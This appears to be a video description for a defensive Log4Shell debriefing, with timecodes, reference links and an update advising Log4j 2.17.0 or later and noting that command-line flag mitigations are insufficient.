LOG4SHELL - ARE YOU TIRED YET? (CVE-2021-44228 and CVE-2021-45046 and new mutations)
It's mutating! Time to do a full log4shell debriefing, I'll go through exploits CVE-2021-44228 and CVE-2021-45046, how to protect from those vulnerabilities, and what has happened since this all began. This video is a bit longer, and I'll cover many details and answers to questions that were asked in the comments of my previous videos sections, so sit down, grab a good drink, and educate yourself a bit more. In the end, I'll show something called Logout4Shell, and some memes.
As always, feel free to drop comments, questions, fill in details, and most importantly, post any good Log4Shell memes that made you smile. Also, do you want more of these, or tired of hearing about Log4Shell, time to move on? Let me know in the comments section!
Timecodes:
0:00 - Introduction
0:53 - CVE-2021-44228 and CVE-2021-45046, the original and new vulnerabilities and patches
3:50 - Log4Shell is mutating - can you detect it?
6:50 - How to patch things the best and easy way, right now?
8:10 - Do the new JVM versions protect you from this attack?
10:37 - Some command line mitigations for desperate measures
17:20 - Log4jHotPatch - agent to dynamically patch running processes that cannot be stopped
19:58 - How about products and services that contain log4j?
21:20 - Use vulnerability to patch vulnerability (Please don't! :)
22:59 - Log4Shell memes galore and own feelings and thoughts
26:44 - Conclusion and ending words
Here are some links:
• Log4J Security Vulnerability: CVE-202... (Part 1 of my series)
• Log4Shell Security Exploit Deep Dive ... (Part 2 of my series)
https://cve.mitre.org/cgi-bin/cvename...
https://threatpost.com/apache-log4j-l...
https://aws.amazon.com/blogs/opensour...
https://aws.amazon.com/security/secur...
https://www.microsoft.com/security/bl...
https://log4jmemes.com/
NOTE: Things move fast so some updates to this video (or watch my more recent ones):
As I suspected, more vulnerabilities have been discovered since the original one
Log4j 2.15.0 is not good enough, update to 2.17.0 or later, when they become available
Command-line parameters do not fully protect you, so tricks like log4j2.formatMsgNoLookups and remote execution toggles are not enough to give full protection
Read more from here, under "Older (discredited) mitigation measures": https://logging.apache.org/log4j/2.x/...
